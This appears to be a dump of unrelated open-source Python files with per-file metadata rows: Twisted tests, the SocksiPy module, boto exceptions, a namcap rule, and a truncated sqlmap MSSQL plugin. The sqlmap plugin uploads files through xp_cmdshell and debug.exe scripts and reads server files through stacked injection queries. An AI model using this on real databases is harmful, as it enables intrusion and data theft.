output_file = 'TscIxPythonLib_v{}.py'.format(ixos_version)
OUTPUT = open(output_file, 'w')
OUTPUT.write(HEAD)
OUTPUT.write('\n'.join(FUNCTIONS))
OUTPUT.write(TAIL)
OUTPUT.close()
# Eof()
| apache-2.0 | 7,404,327,283,181,116,000 | 29.538462 | 120 | 0.597042 | false |
charactory/namcap | Namcap/fhsmanpages.py | 2 | 1594 | #
# namcap rules - fhsmanpages
# Copyright (C) 2008 Aaron Griffin <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
import os
import tarfile
class package:
def short_name(self):
return "fhs-manpages"
def long_name(self):
return "Verifies correct installation of man pages"
def prereq(self):
return "tar"
def analyze(self, pkginfo, tar):
gooddir = 'usr/share/man'
bad_dir = 'usr/man'
ret = [[],[],[]]
for i in tar.getmembers():
if i.name.startswith(bad_dir):
ret[0].append("Non-FHS man page (" + i.name + ") found. Use /usr/share/man instead")
elif not i.name.startswith(gooddir):
#Check everything else to see if it has a 'man' path component
for part in i.name.split(os.sep):
if part == "man":
ret[1].append("Potential non-FHS man page (" + i.name + ") found.")
return ret
def type(self):
return "tarball"
# vim: set ts=4 sw=4 noet:
| gpl-2.0 | 9,022,469,419,903,615,000 | 33.652174 | 88 | 0.694479 | false |
dparlevliet/zelenka-report-storage | server-db/twisted/trial/_dist/test/test_worker.py | 33 | 14642 | # Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Test for distributed trial worker side.
"""
import os
from cStringIO import StringIO
from zope.interface.verify import verifyObject
from twisted.trial.reporter import TestResult
from twisted.trial.unittest import TestCase
from twisted.trial._dist.worker import (
LocalWorker, LocalWorkerAMP, LocalWorkerTransport, WorkerProtocol)
from twisted.trial._dist import managercommands, workercommands
from twisted.scripts import trial
from twisted.test.proto_helpers import StringTransport
from twisted.internet.interfaces import ITransport, IAddress
from twisted.internet.defer import fail, succeed
from twisted.internet.main import CONNECTION_DONE
from twisted.internet.error import ConnectionDone
from twisted.python.failure import Failure
from twisted.protocols.amp import AMP
class FakeAMP(AMP):
"""
A fake amp protocol.
"""
class WorkerProtocolTestCase(TestCase):
"""
Tests for L{WorkerProtocol}.
"""
def setUp(self):
"""
Set up a transport, a result stream and a protocol instance.
"""
self.serverTransport = StringTransport()
self.clientTransport = StringTransport()
self.server = WorkerProtocol()
self.server.makeConnection(self.serverTransport)
self.client = FakeAMP()
self.client.makeConnection(self.clientTransport)
def test_run(self):
"""
Calling the L{workercommands.Run} command on the client returns a
        response with C{success} set to C{True}.
"""
d = self.client.callRemote(workercommands.Run, testCase="doesntexist")
def check(result):
self.assertTrue(result['success'])
d.addCallback(check)
self.server.dataReceived(self.clientTransport.value())
self.clientTransport.clear()
self.client.dataReceived(self.serverTransport.value())
self.serverTransport.clear()
return d
def test_start(self):
"""
The C{start} command changes the current path.
"""
curdir = os.path.realpath(os.path.curdir)
self.addCleanup(os.chdir, curdir)
self.server.start('..')
self.assertNotEqual(os.path.realpath(os.path.curdir), curdir)
class LocalWorkerAMPTestCase(TestCase):
"""
Test case for distributed trial's manager-side local worker AMP protocol
"""
def setUp(self):
self.managerTransport = StringTransport()
self.managerAMP = LocalWorkerAMP()
self.managerAMP.makeConnection(self.managerTransport)
self.result = TestResult()
self.workerTransport = StringTransport()
self.worker = AMP()
self.worker.makeConnection(self.workerTransport)
config = trial.Options()
self.testName = "twisted.doesnexist"
config['tests'].append(self.testName)
self.testCase = trial._getSuite(config)._tests.pop()
self.managerAMP.run(self.testCase, self.result)
self.managerTransport.clear()
def pumpTransports(self):
"""
Sends data from C{self.workerTransport} to C{self.managerAMP}, and then
data from C{self.managerTransport} back to C{self.worker}.
"""
self.managerAMP.dataReceived(self.workerTransport.value())
self.workerTransport.clear()
self.worker.dataReceived(self.managerTransport.value())
def test_runSuccess(self):
"""
Run a test, and succeed.
"""
results = []
d = self.worker.callRemote(managercommands.AddSuccess,
testName=self.testName)
d.addCallback(lambda result: results.append(result['success']))
self.pumpTransports()
self.assertTrue(results)
def test_runExpectedFailure(self):
"""
Run a test, and fail expectedly.
"""
results = []
d = self.worker.callRemote(managercommands.AddExpectedFailure,
testName=self.testName, error='error',
todo='todoReason')
d.addCallback(lambda result: results.append(result['success']))
self.pumpTransports()
self.assertEqual(self.testCase, self.result.expectedFailures[0][0])
self.assertTrue(results)
def test_runError(self):
"""
Run a test, and encounter an error.
"""
results = []
d = self.worker.callRemote(managercommands.AddError,
testName=self.testName, error='error',
errorClass='exceptions.ValueError',
frames=[])
d.addCallback(lambda result: results.append(result['success']))
self.pumpTransports()
self.assertEqual(self.testCase, self.result.errors[0][0])
self.assertTrue(results)
def test_runErrorWithFrames(self):
"""
L{LocalWorkerAMP._buildFailure} recreates the C{Failure.frames} from
the C{frames} argument passed to C{AddError}.
"""
results = []
d = self.worker.callRemote(managercommands.AddError,
testName=self.testName, error='error',
errorClass='exceptions.ValueError',
frames=["file.py", "invalid code", "3"])
d.addCallback(lambda result: results.append(result['success']))
self.pumpTransports()
self.assertEqual(self.testCase, self.result.errors[0][0])
self.assertEqual(
[('file.py', 'invalid code', 3, [], [])],
self.result.errors[0][1].frames)
self.assertTrue(results)
def test_runFailure(self):
"""
Run a test, and fail.
"""
results = []
d = self.worker.callRemote(managercommands.AddFailure,
testName=self.testName, fail='fail',
failClass='exceptions.RuntimeError',
frames=[])
d.addCallback(lambda result: results.append(result['success']))
self.pumpTransports()
self.assertEqual(self.testCase, self.result.failures[0][0])
self.assertTrue(results)
def test_runSkip(self):
"""
Run a test, but skip it.
"""
results = []
d = self.worker.callRemote(managercommands.AddSkip,
testName=self.testName, reason='reason')
d.addCallback(lambda result: results.append(result['success']))
self.pumpTransports()
self.assertEqual(self.testCase, self.result.skips[0][0])
self.assertTrue(results)
def test_runUnexpectedSuccesses(self):
"""
Run a test, and succeed unexpectedly.
"""
results = []
d = self.worker.callRemote(managercommands.AddUnexpectedSuccess,
testName=self.testName,
todo='todo')
d.addCallback(lambda result: results.append(result['success']))
self.pumpTransports()
self.assertEqual(self.testCase, self.result.unexpectedSuccesses[0][0])
self.assertTrue(results)
def test_testWrite(self):
"""
L{LocalWorkerAMP.testWrite} writes the data received to its test
stream.
"""
results = []
stream = StringIO()
self.managerAMP.setTestStream(stream)
d = self.worker.callRemote(managercommands.TestWrite,
out="Some output")
d.addCallback(lambda result: results.append(result['success']))
self.pumpTransports()
self.assertEqual("Some output\n", stream.getvalue())
self.assertTrue(results)
def test_stopAfterRun(self):
"""
L{LocalWorkerAMP.run} calls C{stopTest} on its test result once the
C{Run} commands has succeeded.
"""
result = object()
stopped = []
def fakeCallRemote(command, testCase):
return succeed(result)
self.managerAMP.callRemote = fakeCallRemote
class StopTestResult(TestResult):
def stopTest(self, test):
stopped.append(test)
d = self.managerAMP.run(self.testCase, StopTestResult())
self.assertEqual([self.testCase], stopped)
return d.addCallback(self.assertIdentical, result)
class FakeAMProtocol(AMP):
"""
A fake implementation of L{AMP} for testing.
"""
id = 0
dataString = ""
def dataReceived(self, data):
self.dataString += data
def setTestStream(self, stream):
self.testStream = stream
class FakeTransport(object):
"""
A fake process transport implementation for testing.
"""
dataString = ""
calls = 0
def writeToChild(self, fd, data):
self.dataString += data
def loseConnection(self):
self.calls += 1
class LocalWorkerTestCase(TestCase):
"""
Tests for L{LocalWorker} and L{LocalWorkerTransport}.
"""
def test_childDataReceived(self):
"""
L{LocalWorker.childDataReceived} forwards the received data to linked
L{AMP} protocol if the right file descriptor, otherwise forwards to
C{ProcessProtocol.childDataReceived}.
"""
fakeTransport = FakeTransport()
localWorker = LocalWorker(FakeAMProtocol(), '.', 'test.log')
localWorker.makeConnection(fakeTransport)
localWorker._outLog = StringIO()
localWorker.childDataReceived(4, "foo")
localWorker.childDataReceived(1, "bar")
self.assertEqual("foo", localWorker._ampProtocol.dataString)
self.assertEqual("bar", localWorker._outLog.getvalue())
def test_outReceived(self):
"""
L{LocalWorker.outReceived} logs the output into its C{_outLog} log
file.
"""
fakeTransport = FakeTransport()
localWorker = LocalWorker(FakeAMProtocol(), '.', 'test.log')
localWorker.makeConnection(fakeTransport)
localWorker._outLog = StringIO()
data = "The quick brown fox jumps over the lazy dog"
localWorker.outReceived(data)
self.assertEqual(data, localWorker._outLog.getvalue())
def test_errReceived(self):
"""
L{LocalWorker.errReceived} logs the errors into its C{_errLog} log
file.
"""
fakeTransport = FakeTransport()
localWorker = LocalWorker(FakeAMProtocol(), '.', 'test.log')
localWorker.makeConnection(fakeTransport)
localWorker._errLog = StringIO()
data = "The quick brown fox jumps over the lazy dog"
localWorker.errReceived(data)
self.assertEqual(data, localWorker._errLog.getvalue())
def test_write(self):
"""
L{LocalWorkerTransport.write} forwards the written data to the given
transport.
"""
transport = FakeTransport()
localTransport = LocalWorkerTransport(transport)
data = "The quick brown fox jumps over the lazy dog"
localTransport.write(data)
self.assertEqual(data, transport.dataString)
def test_writeSequence(self):
"""
L{LocalWorkerTransport.writeSequence} forwards the written data to the
given transport.
"""
transport = FakeTransport()
localTransport = LocalWorkerTransport(transport)
data = ("The quick ", "brown fox jumps ", "over the lazy dog")
localTransport.writeSequence(data)
self.assertEqual("".join(data), transport.dataString)
def test_loseConnection(self):
"""
L{LocalWorkerTransport.loseConnection} forwards the call to the given
transport.
"""
transport = FakeTransport()
localTransport = LocalWorkerTransport(transport)
localTransport.loseConnection()
self.assertEqual(transport.calls, 1)
def test_connectionLost(self):
"""
L{LocalWorker.connectionLost} closes the log streams.
"""
class FakeStream(object):
callNumber = 0
def close(self):
self.callNumber += 1
transport = FakeTransport()
localWorker = LocalWorker(FakeAMProtocol(), '.', 'test.log')
localWorker.makeConnection(transport)
localWorker._outLog = FakeStream()
localWorker._errLog = FakeStream()
localWorker.connectionLost(None)
self.assertEqual(localWorker._outLog.callNumber, 1)
self.assertEqual(localWorker._errLog.callNumber, 1)
def test_processEnded(self):
"""
L{LocalWorker.processEnded} calls C{connectionLost} on itself and on
the L{AMP} protocol.
"""
class FakeStream(object):
callNumber = 0
def close(self):
self.callNumber += 1
transport = FakeTransport()
protocol = FakeAMProtocol()
localWorker = LocalWorker(protocol, '.', 'test.log')
localWorker.makeConnection(transport)
localWorker._outLog = FakeStream()
localWorker.processEnded(Failure(CONNECTION_DONE))
self.assertEqual(localWorker._outLog.callNumber, 1)
self.assertIdentical(None, protocol.transport)
return self.assertFailure(localWorker.endDeferred, ConnectionDone)
def test_addresses(self):
"""
L{LocalWorkerTransport.getPeer} and L{LocalWorkerTransport.getHost}
return L{IAddress} objects.
"""
localTransport = LocalWorkerTransport(None)
self.assertTrue(verifyObject(IAddress, localTransport.getPeer()))
self.assertTrue(verifyObject(IAddress, localTransport.getHost()))
def test_transport(self):
"""
L{LocalWorkerTransport} implements L{ITransport} to be able to be used
by L{AMP}.
"""
localTransport = LocalWorkerTransport(None)
self.assertTrue(verifyObject(ITransport, localTransport))
def test_startError(self):
"""
L{LocalWorker} swallows the exceptions returned by the L{AMP} protocol
start method, as it generates unnecessary errors.
"""
def failCallRemote(command, directory):
return fail(RuntimeError("oops"))
transport = FakeTransport()
protocol = FakeAMProtocol()
protocol.callRemote = failCallRemote
localWorker = LocalWorker(protocol, '.', 'test.log')
localWorker.makeConnection(transport)
self.assertEqual([], self.flushLoggedErrors(RuntimeError))
| lgpl-3.0 | -8,039,814,673,655,041,000 | 29.955603 | 79 | 0.619246 | false |
konrado0/vosqa | forum_modules/oauthauth/lib/oauth2/httplib2/socks.py | 29 | 16293 | """SocksiPy - Python SOCKS module.
Version 1.00
Copyright 2006 Dan-Haim. All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of Dan Haim nor the names of his contributors may be used
to endorse or promote products derived from this software without specific
prior written permission.
THIS SOFTWARE IS PROVIDED BY DAN HAIM "AS IS" AND ANY EXPRESS OR IMPLIED
WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
EVENT SHALL DAN HAIM OR HIS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA
OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
This module provides a standard socket-like interface for Python
for tunneling connections through SOCKS proxies.
"""
"""
Minor modifications made by Christopher Gilbert (http://motomastyle.com/)
for use in PyLoris (http://pyloris.sourceforge.net/)
Minor modifications made by Mario Vilas (http://breakingcode.wordpress.com/)
mainly to merge bug fixes found in Sourceforge
"""
import socket
import struct
import sys
if getattr(socket, 'socket', None) is None:
raise ImportError('socket.socket missing, proxy support unusable')
PROXY_TYPE_SOCKS4 = 1
PROXY_TYPE_SOCKS5 = 2
PROXY_TYPE_HTTP = 3
_defaultproxy = None
_orgsocket = socket.socket
class ProxyError(Exception): pass
class GeneralProxyError(ProxyError): pass
class Socks5AuthError(ProxyError): pass
class Socks5Error(ProxyError): pass
class Socks4Error(ProxyError): pass
class HTTPError(ProxyError): pass
_generalerrors = ("success",
"invalid data",
"not connected",
"not available",
"bad proxy type",
"bad input")
_socks5errors = ("succeeded",
"general SOCKS server failure",
"connection not allowed by ruleset",
"Network unreachable",
"Host unreachable",
"Connection refused",
"TTL expired",
"Command not supported",
"Address type not supported",
"Unknown error")
_socks5autherrors = ("succeeded",
"authentication is required",
"all offered authentication methods were rejected",
"unknown username or invalid password",
"unknown error")
_socks4errors = ("request granted",
"request rejected or failed",
"request rejected because SOCKS server cannot connect to identd on the client",
"request rejected because the client program and identd report different user-ids",
"unknown error")
def setdefaultproxy(proxytype=None, addr=None, port=None, rdns=True, username=None, password=None):
"""setdefaultproxy(proxytype, addr[, port[, rdns[, username[, password]]]])
Sets a default proxy which all further socksocket objects will use,
unless explicitly changed.
"""
global _defaultproxy
_defaultproxy = (proxytype, addr, port, rdns, username, password)
def wrapmodule(module):
"""wrapmodule(module)
Attempts to replace a module's socket library with a SOCKS socket. Must set
a default proxy using setdefaultproxy(...) first.
This will only work on modules that import socket directly into the namespace;
most of the Python Standard Library falls into this category.
"""
if _defaultproxy != None:
module.socket.socket = socksocket
else:
raise GeneralProxyError((4, "no proxy specified"))
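# Illustrative sketch (added note, not part of the original module): a typical
# use of the two helpers above is to route an existing library's sockets
# through a SOCKS proxy. The proxy address below is a made-up placeholder.
#
#     import ftplib
#     setdefaultproxy(PROXY_TYPE_SOCKS5, "127.0.0.1", 1080)
#     wrapmodule(ftplib)
#     # ftplib now creates socksocket instances instead of plain sockets.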
class socksocket(socket.socket):
"""socksocket([family[, type[, proto]]]) -> socket object
Open a SOCKS enabled socket. The parameters are the same as
those of the standard socket init. In order for SOCKS to work,
you must specify family=AF_INET, type=SOCK_STREAM and proto=0.
"""
def __init__(self, family=socket.AF_INET, type=socket.SOCK_STREAM, proto=0, _sock=None):
_orgsocket.__init__(self, family, type, proto, _sock)
if _defaultproxy != None:
self.__proxy = _defaultproxy
else:
self.__proxy = (None, None, None, None, None, None)
self.__proxysockname = None
self.__proxypeername = None
def __recvall(self, count):
"""__recvall(count) -> data
Receive EXACTLY the number of bytes requested from the socket.
Blocks until the required number of bytes have been received.
"""
data = self.recv(count)
while len(data) < count:
d = self.recv(count-len(data))
if not d: raise GeneralProxyError((0, "connection closed unexpectedly"))
data = data + d
return data
def setproxy(self, proxytype=None, addr=None, port=None, rdns=True, username=None, password=None):
"""setproxy(proxytype, addr[, port[, rdns[, username[, password]]]])
Sets the proxy to be used.
proxytype - The type of the proxy to be used. Three types
are supported: PROXY_TYPE_SOCKS4 (including socks4a),
PROXY_TYPE_SOCKS5 and PROXY_TYPE_HTTP
addr - The address of the server (IP or DNS).
port - The port of the server. Defaults to 1080 for SOCKS
servers and 8080 for HTTP proxy servers.
        rdns -        Should DNS queries be performed on the remote side
(rather than the local side). The default is True.
Note: This has no effect with SOCKS4 servers.
username - Username to authenticate with to the server.
The default is no authentication.
password - Password to authenticate with to the server.
Only relevant when username is also provided.
"""
self.__proxy = (proxytype, addr, port, rdns, username, password)
def __negotiatesocks5(self, destaddr, destport):
"""__negotiatesocks5(self,destaddr,destport)
Negotiates a connection through a SOCKS5 server.
"""
# First we'll send the authentication packages we support.
if (self.__proxy[4]!=None) and (self.__proxy[5]!=None):
# The username/password details were supplied to the
# setproxy method so we support the USERNAME/PASSWORD
# authentication (in addition to the standard none).
self.sendall(struct.pack('BBBB', 0x05, 0x02, 0x00, 0x02))
else:
# No username/password were entered, therefore we
# only support connections with no authentication.
self.sendall(struct.pack('BBB', 0x05, 0x01, 0x00))
# We'll receive the server's response to determine which
# method was selected
chosenauth = self.__recvall(2)
if chosenauth[0:1] != chr(0x05).encode():
self.close()
raise GeneralProxyError((1, _generalerrors[1]))
# Check the chosen authentication method
if chosenauth[1:2] == chr(0x00).encode():
# No authentication is required
pass
elif chosenauth[1:2] == chr(0x02).encode():
# Okay, we need to perform a basic username/password
# authentication.
self.sendall(chr(0x01).encode() + chr(len(self.__proxy[4])) + self.__proxy[4] + chr(len(self.__proxy[5])) + self.__proxy[5])
authstat = self.__recvall(2)
if authstat[0:1] != chr(0x01).encode():
# Bad response
self.close()
raise GeneralProxyError((1, _generalerrors[1]))
if authstat[1:2] != chr(0x00).encode():
# Authentication failed
self.close()
raise Socks5AuthError((3, _socks5autherrors[3]))
# Authentication succeeded
else:
# Reaching here is always bad
self.close()
if chosenauth[1] == chr(0xFF).encode():
raise Socks5AuthError((2, _socks5autherrors[2]))
else:
raise GeneralProxyError((1, _generalerrors[1]))
# Now we can request the actual connection
req = struct.pack('BBB', 0x05, 0x01, 0x00)
# If the given destination address is an IP address, we'll
# use the IPv4 address request even if remote resolving was specified.
try:
ipaddr = socket.inet_aton(destaddr)
req = req + chr(0x01).encode() + ipaddr
except socket.error:
# Well it's not an IP number, so it's probably a DNS name.
if self.__proxy[3]:
# Resolve remotely
ipaddr = None
req = req + chr(0x03).encode() + chr(len(destaddr)).encode() + destaddr
else:
# Resolve locally
ipaddr = socket.inet_aton(socket.gethostbyname(destaddr))
req = req + chr(0x01).encode() + ipaddr
req = req + struct.pack(">H", destport)
self.sendall(req)
# Get the response
resp = self.__recvall(4)
if resp[0:1] != chr(0x05).encode():
self.close()
raise GeneralProxyError((1, _generalerrors[1]))
elif resp[1:2] != chr(0x00).encode():
# Connection failed
self.close()
if ord(resp[1:2])<=8:
raise Socks5Error((ord(resp[1:2]), _socks5errors[ord(resp[1:2])]))
else:
raise Socks5Error((9, _socks5errors[9]))
# Get the bound address/port
elif resp[3:4] == chr(0x01).encode():
boundaddr = self.__recvall(4)
elif resp[3:4] == chr(0x03).encode():
resp = resp + self.recv(1)
boundaddr = self.__recvall(ord(resp[4:5]))
else:
self.close()
raise GeneralProxyError((1,_generalerrors[1]))
boundport = struct.unpack(">H", self.__recvall(2))[0]
self.__proxysockname = (boundaddr, boundport)
if ipaddr != None:
self.__proxypeername = (socket.inet_ntoa(ipaddr), destport)
else:
self.__proxypeername = (destaddr, destport)
def getproxysockname(self):
"""getsockname() -> address info
Returns the bound IP address and port number at the proxy.
"""
return self.__proxysockname
def getproxypeername(self):
"""getproxypeername() -> address info
Returns the IP and port number of the proxy.
"""
return _orgsocket.getpeername(self)
def getpeername(self):
"""getpeername() -> address info
Returns the IP address and port number of the destination
machine (note: getproxypeername returns the proxy)
"""
return self.__proxypeername
def __negotiatesocks4(self,destaddr,destport):
"""__negotiatesocks4(self,destaddr,destport)
Negotiates a connection through a SOCKS4 server.
"""
# Check if the destination address provided is an IP address
rmtrslv = False
try:
ipaddr = socket.inet_aton(destaddr)
except socket.error:
# It's a DNS name. Check where it should be resolved.
if self.__proxy[3]:
ipaddr = struct.pack("BBBB", 0x00, 0x00, 0x00, 0x01)
rmtrslv = True
else:
ipaddr = socket.inet_aton(socket.gethostbyname(destaddr))
# Construct the request packet
req = struct.pack(">BBH", 0x04, 0x01, destport) + ipaddr
# The username parameter is considered userid for SOCKS4
if self.__proxy[4] != None:
req = req + self.__proxy[4]
req = req + chr(0x00).encode()
# DNS name if remote resolving is required
# NOTE: This is actually an extension to the SOCKS4 protocol
# called SOCKS4A and may not be supported in all cases.
if rmtrslv:
req = req + destaddr + chr(0x00).encode()
self.sendall(req)
# Get the response from the server
resp = self.__recvall(8)
if resp[0:1] != chr(0x00).encode():
# Bad data
self.close()
raise GeneralProxyError((1,_generalerrors[1]))
if resp[1:2] != chr(0x5A).encode():
# Server returned an error
self.close()
if ord(resp[1:2]) in (91, 92, 93):
self.close()
raise Socks4Error((ord(resp[1:2]), _socks4errors[ord(resp[1:2]) - 90]))
else:
raise Socks4Error((94, _socks4errors[4]))
# Get the bound address/port
self.__proxysockname = (socket.inet_ntoa(resp[4:]), struct.unpack(">H", resp[2:4])[0])
if rmtrslv != None:
self.__proxypeername = (socket.inet_ntoa(ipaddr), destport)
else:
self.__proxypeername = (destaddr, destport)
def __negotiatehttp(self, destaddr, destport):
"""__negotiatehttp(self,destaddr,destport)
Negotiates a connection through an HTTP server.
"""
# If we need to resolve locally, we do this now
if not self.__proxy[3]:
addr = socket.gethostbyname(destaddr)
else:
addr = destaddr
self.sendall(("CONNECT " + addr + ":" + str(destport) + " HTTP/1.1\r\n" + "Host: " + destaddr + "\r\n\r\n").encode())
# We read the response until we get the string "\r\n\r\n"
resp = self.recv(1)
while resp.find("\r\n\r\n".encode()) == -1:
resp = resp + self.recv(1)
# We just need the first line to check if the connection
# was successful
statusline = resp.splitlines()[0].split(" ".encode(), 2)
if statusline[0] not in ("HTTP/1.0".encode(), "HTTP/1.1".encode()):
self.close()
raise GeneralProxyError((1, _generalerrors[1]))
try:
statuscode = int(statusline[1])
except ValueError:
self.close()
raise GeneralProxyError((1, _generalerrors[1]))
if statuscode != 200:
self.close()
raise HTTPError((statuscode, statusline[2]))
self.__proxysockname = ("0.0.0.0", 0)
self.__proxypeername = (addr, destport)
def connect(self, destpair):
"""connect(self, despair)
Connects to the specified destination through a proxy.
destpar - A tuple of the IP/DNS address and the port number.
(identical to socket's connect).
To select the proxy server use setproxy().
"""
# Do a minimal input check first
if (not type(destpair) in (list,tuple)) or (len(destpair) < 2) or (type(destpair[0]) != type('')) or (type(destpair[1]) != int):
raise GeneralProxyError((5, _generalerrors[5]))
if self.__proxy[0] == PROXY_TYPE_SOCKS5:
if self.__proxy[2] != None:
portnum = self.__proxy[2]
else:
portnum = 1080
_orgsocket.connect(self, (self.__proxy[1], portnum))
self.__negotiatesocks5(destpair[0], destpair[1])
elif self.__proxy[0] == PROXY_TYPE_SOCKS4:
if self.__proxy[2] != None:
portnum = self.__proxy[2]
else:
portnum = 1080
_orgsocket.connect(self,(self.__proxy[1], portnum))
self.__negotiatesocks4(destpair[0], destpair[1])
elif self.__proxy[0] == PROXY_TYPE_HTTP:
if self.__proxy[2] != None:
portnum = self.__proxy[2]
else:
portnum = 8080
_orgsocket.connect(self,(self.__proxy[1], portnum))
self.__negotiatehttp(destpair[0], destpair[1])
elif self.__proxy[0] == None:
_orgsocket.connect(self, (destpair[0], destpair[1]))
else:
raise GeneralProxyError((4, _generalerrors[4]))
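# Usage sketch (added for illustration; the proxy and target addresses are
# placeholders, not values taken from the original code):
#
#     s = socksocket()
#     s.setproxy(PROXY_TYPE_SOCKS5, "proxy.example.com", 1080)
#     s.connect(("www.example.com", 80))
#     s.sendall("GET / HTTP/1.0\r\n\r\n")
#     data = s.recv(4096)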
| gpl-3.0 | 6,213,641,939,644,820,000 | 41.319481 | 136 | 0.609955 | false |
zachmullen/boto | boto/configservice/exceptions.py | 135 | 2528 | # Copyright (c) 2015 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
from boto.exception import BotoServerError
class InvalidLimitException(BotoServerError):
pass
class NoSuchBucketException(BotoServerError):
pass
class InvalidSNSTopicARNException(BotoServerError):
pass
class ResourceNotDiscoveredException(BotoServerError):
pass
class MaxNumberOfDeliveryChannelsExceededException(BotoServerError):
pass
class LastDeliveryChannelDeleteFailedException(BotoServerError):
pass
class InsufficientDeliveryPolicyException(BotoServerError):
pass
class InvalidRoleException(BotoServerError):
pass
class InvalidTimeRangeException(BotoServerError):
pass
class NoSuchDeliveryChannelException(BotoServerError):
pass
class NoSuchConfigurationRecorderException(BotoServerError):
pass
class InvalidS3KeyPrefixException(BotoServerError):
pass
class InvalidDeliveryChannelNameException(BotoServerError):
pass
class NoRunningConfigurationRecorderException(BotoServerError):
pass
class ValidationException(BotoServerError):
pass
class NoAvailableConfigurationRecorderException(BotoServerError):
pass
class InvalidNextTokenException(BotoServerError):
pass
class InvalidConfigurationRecorderNameException(BotoServerError):
pass
class NoAvailableDeliveryChannelException(BotoServerError):
pass
class MaxNumberOfConfigurationRecordersExceededException(BotoServerError):
pass
| mit | 5,010,268,583,664,105,000 | 23.543689 | 77 | 0.800633 | false |
sanghinitin/golismero | tools/sqlmap/plugins/dbms/mssqlserver/filesystem.py | 8 | 14284 | #!/usr/bin/env python
"""
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import ntpath
import os
from lib.core.common import getLimitRange
from lib.core.common import isNumPosStrValue
from lib.core.common import isTechniqueAvailable
from lib.core.common import posixToNtSlashes
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.convert import hexencode
from lib.core.data import conf
from lib.core.data import logger
from lib.core.enums import CHARSET_TYPE
from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD
from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapUnsupportedFeatureException
from lib.request import inject
from plugins.generic.filesystem import Filesystem as GenericFilesystem
class Filesystem(GenericFilesystem):
def __init__(self):
GenericFilesystem.__init__(self)
def _dataToScr(self, fileContent, chunkName):
fileLines = []
fileSize = len(fileContent)
lineAddr = 0x100
lineLen = 20
fileLines.append("n %s" % chunkName)
fileLines.append("rcx")
fileLines.append("%x" % fileSize)
fileLines.append("f 0100 %x 00" % fileSize)
for fileLine in xrange(0, len(fileContent), lineLen):
scrString = ""
for lineChar in fileContent[fileLine:fileLine + lineLen]:
strLineChar = hexencode(lineChar)
if not scrString:
scrString = "e %x %s" % (lineAddr, strLineChar)
else:
scrString += " %s" % strLineChar
lineAddr += len(lineChar)
fileLines.append(scrString)
fileLines.append("w")
fileLines.append("q")
return fileLines
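    # Added illustration (not in the original source): for a two-byte payload
    # "AB" and chunk name "xyz", the method above would emit a debug.exe
    # script along the lines of:
    #
    #     n xyz
    #     rcx
    #     2
    #     f 0100 2 00
    #     e 100 41 42
    #     w
    #     q
    #
    # i.e. the bytes are re-entered as hex at offset 0x100 and written out.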
def _updateDestChunk(self, fileContent, tmpPath):
randScr = "tmpf%s.scr" % randomStr(lowercase=True)
chunkName = randomStr(lowercase=True)
fileScrLines = self._dataToScr(fileContent, chunkName)
logger.debug("uploading debug script to %s\%s, please wait.." % (tmpPath, randScr))
self.xpCmdshellWriteFile(fileScrLines, tmpPath, randScr)
logger.debug("generating chunk file %s\%s from debug script %s" % (tmpPath, chunkName, randScr))
commands = ("cd %s" % tmpPath, "debug < %s" % randScr, "del /F /Q %s" % randScr)
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
return chunkName
def stackedReadFile(self, rFile):
infoMsg = "fetching file: '%s'" % rFile
logger.info(infoMsg)
result = []
txtTbl = self.fileTblName
hexTbl = "%shex" % self.fileTblName
self.createSupportTbl(txtTbl, self.tblField, "text")
inject.goStacked("DROP TABLE %s" % hexTbl)
inject.goStacked("CREATE TABLE %s(id INT IDENTITY(1, 1) PRIMARY KEY, %s %s)" % (hexTbl, self.tblField, "VARCHAR(4096)"))
logger.debug("loading the content of file '%s' into support table" % rFile)
